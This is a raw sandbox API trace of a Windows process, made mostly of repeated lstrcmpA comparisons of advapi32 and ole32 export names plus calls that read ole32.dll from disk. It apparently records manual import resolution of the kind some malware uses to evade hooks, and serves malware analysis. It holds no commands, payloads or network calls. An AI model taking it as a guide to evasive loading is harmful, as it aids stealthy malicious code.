[0112.384] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAInit") returned 1 [0112.384] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAUpdate") returned 1 [0112.384] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AbortSystemShutdownA") returned 1 [0112.384] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AbortSystemShutdownW") returned 1 [0112.384] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheck") returned 1 [0112.384] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0112.384] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0112.384] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByType") returned 1 [0112.384] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0112.384] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0112.384] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultList") returned 1 [0112.384] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0112.384] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0112.384] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 0 [0112.384] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0112.384] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0112.384] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0112.384] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0112.384] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0112.384] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0112.384] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0112.384] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0112.384] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByType") returned 1 [0112.384] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0112.384] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0112.384] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultList") returned 1 [0112.384] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0112.385] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0112.385] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0112.385] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 0 [0112.385] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAFinal") returned 1 [0112.385] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAInit") returned 1 [0112.385] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAUpdate") returned 1 [0112.385] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AbortSystemShutdownA") returned 1 [0112.385] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AbortSystemShutdownW") returned 1 [0112.385] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheck") returned 1 [0112.385] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0112.385] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0112.385] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByType") returned 1 [0112.385] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0112.385] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0112.385] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultList") returned 1 [0112.385] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0112.385] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0112.385] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0112.385] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0112.385] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AddAccessAllowedAce") returned 0 [0112.385] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAFinal") returned 1 [0112.385] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAInit") returned 1 [0112.385] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAUpdate") returned 1 [0112.385] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AbortSystemShutdownA") returned 1 [0112.385] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AbortSystemShutdownW") returned 1 [0112.386] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheck") returned 1 [0112.386] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0112.386] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0112.386] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByType") returned 1 [0112.386] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0112.386] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0112.386] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultList") returned 1 [0112.386] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0112.386] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0112.386] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0112.386] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0112.386] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AddAccessAllowedAce") returned 1 [0112.386] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AddAccessAllowedAceEx") returned 0 [0112.386] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAFinal") returned 1 [0112.386] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAInit") returned 1 [0112.386] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAUpdate") returned 1 [0112.386] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AbortSystemShutdownA") returned 1 [0112.386] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AbortSystemShutdownW") returned 1 [0112.386] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheck") returned 1 [0112.386] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0112.386] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0112.386] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByType") returned 1 [0112.386] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0112.386] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0112.386] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultList") returned 1 [0112.386] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0112.386] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0112.386] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0112.387] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0112.387] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedAce") returned 1 [0112.387] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedAceEx") returned 1 [0112.387] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedObjectAce") returned 0 [0112.387] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAFinal") returned 1 [0112.387] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAInit") returned 1 [0112.387] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAUpdate") returned 1 [0112.387] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AbortSystemShutdownA") returned 1 [0112.387] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AbortSystemShutdownW") returned 1 [0112.387] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheck") returned 1 [0112.387] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0112.387] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0112.387] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByType") returned 1 [0112.387] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0112.387] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0112.387] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultList") returned 1 [0112.387] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0112.387] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0112.387] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0112.387] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0112.387] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedAce") returned 1 [0112.387] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedAceEx") returned 1 [0112.387] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedObjectAce") returned 1 [0112.387] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessDeniedAce") returned 0 [0112.387] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAFinal") returned 1 [0112.387] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAInit") returned 1 [0112.387] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAUpdate") returned 1 [0112.387] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AbortSystemShutdownA") returned 1 [0112.388] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AbortSystemShutdownW") returned 1 [0112.388] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheck") returned 1 [0112.388] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0112.388] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0112.388] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByType") returned 1 [0112.388] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0112.388] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0112.388] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultList") returned 1 [0112.388] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0112.388] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0112.388] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0112.388] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0112.388] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedAce") returned 1 [0112.388] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedAceEx") returned 1 [0112.388] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedObjectAce") returned 1 [0112.388] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessDeniedAce") returned 1 [0112.388] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessDeniedAceEx") returned 0 [0112.388] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAFinal") returned 1 [0112.388] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAInit") returned 1 [0112.388] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAUpdate") returned 1 [0112.388] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AbortSystemShutdownA") returned 1 [0112.388] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AbortSystemShutdownW") returned 1 [0112.388] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheck") returned 1 [0112.388] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0112.389] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0112.389] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByType") returned 1 [0112.389] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0112.389] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0112.389] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultList") returned 1 [0112.389] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0112.389] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0112.389] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0112.389] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0112.389] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedAce") returned 1 [0112.389] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedAceEx") returned 1 [0112.389] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedObjectAce") returned 1 [0112.389] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedAce") returned 1 [0112.389] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedAceEx") returned 1 [0112.389] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedObjectAce") returned 0 [0112.389] lstrcmpA (lpString1="AddAce", lpString2="A_SHAFinal") returned 1 [0112.389] lstrcmpA (lpString1="AddAce", lpString2="A_SHAInit") returned 1 [0112.975] GetProcessHeap () returned 0x590000 [0112.975] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2d02010 | out: hHeap=0x590000) returned 1 [0112.976] GetProcessHeap () returned 0x590000 [0112.976] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x5a9020 [0112.977] LoadLibraryA (lpLibFileName="Ole32.dll") returned 0x7ffc5e3e0000 [0112.978] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0112.978] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0112.978] GetModuleFileNameA (in: hModule=0x7ffc5e3e0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")) returned 0x1d [0112.978] CreateFileA (lpFileName="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0112.979] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0112.979] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0112.979] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1322240) returned 1 [0112.979] GetProcessHeap () returned 0x590000 [0112.979] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x142d00) returned 0x40cf040 [0112.983] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0112.983] ReadFile (in: hFile=0x140, lpBuffer=0x40cf040, nNumberOfBytesToRead=0x142d00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x40cf040*, lpNumberOfBytesRead=0x14f5a4*=0x142d00, lpOverlapped=0x0) returned 1 [0113.201] CloseHandle (hObject=0x140) returned 1 [0113.201] lstrcmpA (lpString1="BindMoniker", lpString2="BindMoniker") returned 0 [0113.201] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="BindMoniker") returned 1 [0113.201] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0113.201] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0113.201] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFreeExt") returned 0 [0113.201] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="BindMoniker") returned 1 [0113.201] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0113.201] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0113.202] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0113.202] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0113.202] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0113.202] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 0 [0113.202] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="BindMoniker") returned 1 [0113.202] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0113.202] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0113.202] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0113.202] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0113.202] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0113.202] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0113.202] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSize") returned 1 [0113.202] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSize64") returned 1 [0113.202] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSizeExt") returned 0 [0113.202] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="BindMoniker") returned 1 [0113.202] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0113.202] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0113.202] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0113.202] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0113.202] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0113.202] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0113.202] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSize") returned 1 [0113.203] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSize64") returned 1 [0113.203] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0113.203] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0113.203] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0113.203] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 0 [0113.203] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="BindMoniker") returned 1 [0113.203] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFree") returned 1 [0113.203] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFree64") returned 1 [0113.203] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0113.203] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0113.203] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0113.203] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0113.203] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSize") returned 1 [0113.203] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSize64") returned 1 [0113.203] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0113.203] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0113.203] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0113.203] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0113.203] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromOle1Class") returned 1 [0113.203] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromProgID") returned 1 [0113.204] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromProgIDEx") returned 0 [0113.204] lstrcmpA (lpString1="CheckInitDde", lpString2="BindMoniker") returned 1 [0113.204] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFree") returned -1 [0113.204] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFree64") returned -1 [0113.204] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0113.204] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0113.204] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0113.204] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0113.204] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSize") returned -1 [0113.204] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSize64") returned -1 [0113.204] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0113.204] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0113.204] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0113.204] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0113.204] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromOle1Class") returned -1 [0113.204] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromProgID") returned -1 [0113.204] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromProgIDEx") returned -1 [0113.204] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromString") returned -1 [0113.204] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0113.204] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0113.204] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0113.204] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0113.205] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0113.205] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0113.205] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0113.205] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0113.205] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0113.205] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_Connect") returned -1 [0113.205] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0113.205] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0113.205] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0113.205] lstrcmpA 